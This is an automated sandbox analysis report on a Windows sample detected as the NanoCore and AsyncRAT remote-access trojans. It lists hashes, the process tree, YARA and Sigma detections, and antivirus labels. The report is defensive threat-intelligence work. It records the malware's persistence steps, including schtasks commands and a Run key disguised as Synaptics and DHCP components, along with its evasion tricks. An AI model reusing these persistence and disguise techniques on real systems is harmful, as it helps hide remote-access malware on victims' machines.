Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y8kdmHi6x3.exe

Overview

General Information

Sample Name:y8kdmHi6x3.exe
Analysis ID:560001
MD5:bff363a92ac43ff249652a83dadc02ab
SHA1:3c7b47a3f4dc3c8555b656505244886cb3a172f5
SHA256:d054e33de2d63966c68b44dd1d1de8a9b7abb76781100fe82423c80e112d4580
Tags:exeNanoCoreRAT
Infos:

Detection

Nanocore AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AsyncRAT
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Drops PE files to the document folder of the user
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to detect sandboxes (mouse cursor move detection)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • y8kdmHi6x3.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\y8kdmHi6x3.exe" MD5: BFF363A92AC43FF249652A83DADC02AB)
    • y8kdmHi6x3.exe (PID: 4844 cmdline: C:\Users\user\Desktop\y8kdmHi6x3.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
      • ._cache_y8kdmHi6x3.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
        • SYSTEM32.EXE (PID: 6952 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
        • WINDOWS.EXE (PID: 7016 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
          • ._cache_WINDOWS.EXE (PID: 6580 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
            • schtasks.exe (PID: 3752 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 7132 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Synaptics.exe (PID: 4928 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: BFF363A92AC43FF249652A83DADC02AB)
            • Synaptics.exe (PID: 4964 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
              • ._cache_Synaptics.exe (PID: 1464 cmdline: "C:\Users\user\Desktop\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
                • SYSTEM32.EXE (PID: 6372 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
                • WINDOWS.EXE (PID: 6224 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
                  • ._cache_WINDOWS.EXE (PID: 6476 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
      • Synaptics.exe (PID: 6964 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: BFF363A92AC43FF249652A83DADC02AB)
        • Synaptics.exe (PID: 5684 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
          • ._cache_Synaptics.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
            • SYSTEM32.EXE (PID: 6984 cmdline: "C:\Users\user\Desktop\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
            • WINDOWS.EXE (PID: 7044 cmdline: "C:\Users\user\Desktop\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
              • ._cache_WINDOWS.EXE (PID: 6792 cmdline: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
          • WerFault.exe (PID: 6540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • Synaptics.exe (PID: 6632 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: BFF363A92AC43FF249652A83DADC02AB)
    • Synaptics.exe (PID: 5976 cmdline: C:\ProgramData\Synaptics\Synaptics.exe MD5: BFF363A92AC43FF249652A83DADC02AB)
      • ._cache_Synaptics.exe (PID: 5984 cmdline: "C:\ProgramData\Synaptics\._cache_Synaptics.exe" MD5: 3A5072A9A5DC35DFB99A59F67C3DC6C0)
        • SYSTEM32.EXE (PID: 6064 cmdline: "C:\ProgramData\Synaptics\SYSTEM32.EXE" MD5: 807474FC253612359DC697E331F01B43)
        • WINDOWS.EXE (PID: 2256 cmdline: "C:\ProgramData\Synaptics\WINDOWS.EXE" MD5: 6278F321B0B9C85A0DF4E485A8DE7993)
          • ._cache_WINDOWS.EXE (PID: 672 cmdline: "C:\ProgramData\Synaptics\._cache_WINDOWS.EXE" MD5: 568E6A074378730CEE0947C4C796372D)
  • ._cache_WINDOWS.EXE (PID: 6692 cmdline: C:\Users\user\Desktop\._cache_WINDOWS.EXE 0 MD5: 568E6A074378730CEE0947C4C796372D)
  • dhcpmon.exe (PID: 5244 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 568E6A074378730CEE0947C4C796372D)
  • EXCEL.EXE (PID: 6564 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\._cache_WINDOWS.EXENanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\Desktop\._cache_WINDOWS.EXENanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\Desktop\._cache_WINDOWS.EXEJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    C:\Users\user\Desktop\._cache_WINDOWS.EXENanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 26 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfcf5:$a: NanoCore
      • 0xfd05:$a: NanoCore
      • 0xff39:$a: NanoCore
      • 0xff4d:$a: NanoCore
      • 0xff8d:$a: NanoCore
      • 0xfd54:$b: ClientPlugin
      • 0xff56:$b: ClientPlugin
      • 0xff96:$b: ClientPlugin
      • 0xfe7b:$c: ProjectData
      • 0x10882:$d: DESCrypto
      • 0x1824e:$e: KeepAlive
      • 0x1623c:$g: LogClientMessage
      • 0x12437:$i: get_Connected
      • 0x10bb8:$j: #=q
      • 0x10be8:$j: #=q
      • 0x10c04:$j: #=q
      • 0x10c34:$j: #=q
      • 0x10c50:$j: #=q
      • 0x10c6c:$j: #=q
      • 0x10c9c:$j: #=q
      • 0x10cb8:$j: #=q
      0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 319 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.0.._cache_WINDOWS.EXE.5b0000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        11.0.._cache_WINDOWS.EXE.5b0000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xff05:$x1: NanoCore Client.exe
        • 0x1018d:$x2: NanoCore.ClientPluginHost
        • 0x117c6:$s1: PluginCommand
        • 0x117ba:$s2: FileCommand
        • 0x1266b:$s3: PipeExists
        • 0x18422:$s4: PipeCreated
        • 0x101b7:$s5: IClientLoggingHost
        11.0.._cache_WINDOWS.EXE.5b0000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          11.0.._cache_WINDOWS.EXE.5b0000.0.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0xfef5:$a: NanoCore
          • 0xff05:$a: NanoCore
          • 0x10139:$a: NanoCore
          • 0x1014d:$a: NanoCore
          • 0x1018d:$a: NanoCore
          • 0xff54:$b: ClientPlugin
          • 0x10156:$b: ClientPlugin
          • 0x10196:$b: ClientPlugin
          • 0x1007b:$c: ProjectData
          • 0x10a82:$d: DESCrypto
          • 0x1844e:$e: KeepAlive
          • 0x1643c:$g: LogClientMessage
          • 0x12637:$i: get_Connected
          • 0x10db8:$j: #=q
          • 0x10de8:$j: #=q
          • 0x10e04:$j: #=q
          • 0x10e34:$j: #=q
          • 0x10e50:$j: #=q
          • 0x10e6c:$j: #=q
          • 0x10e9c:$j: #=q
          • 0x10eb8:$j: #=q
          15.2.Synaptics.exe.4ebff6c.4.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 895 entries

            Sigma Overview

            AV Detection

            barindex
            Sigma detected: NanoCore
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud

            barindex
            Sigma detected: NanoCore
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary

            barindex
            Sigma detected: Suspicius Add Task From User AppData Temp
            Source: Process startedAuthor: frack113: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" , ParentImage: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ParentProcessId: 6580, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp, ProcessId: 3752
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\y8kdmHi6x3.exe, ProcessId: 4844, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

            Stealing of Sensitive Information

            barindex
            Sigma detected: NanoCore
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality

            barindex
            Sigma detected: NanoCore
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1109339
            Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmpAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
            Source: C:\Users\user\Desktop\WINDOWS.EXEAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
            Source: C:\Users\user\Desktop\WINDOWS.EXEAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\Desktop\WINDOWS.EXEAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\Desktop\SYSTEM32.EXEAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\RCX788E.tmpAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exeAvira: detection malicious, Label: HEUR/AGEN.1109339
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\Documents\BNAGMGSPLO\~$cache1Avira: detection malicious, Label: HEUR/AGEN.1109339
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Yara detected Nanocore RAT
            Source: Yara matchFile source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
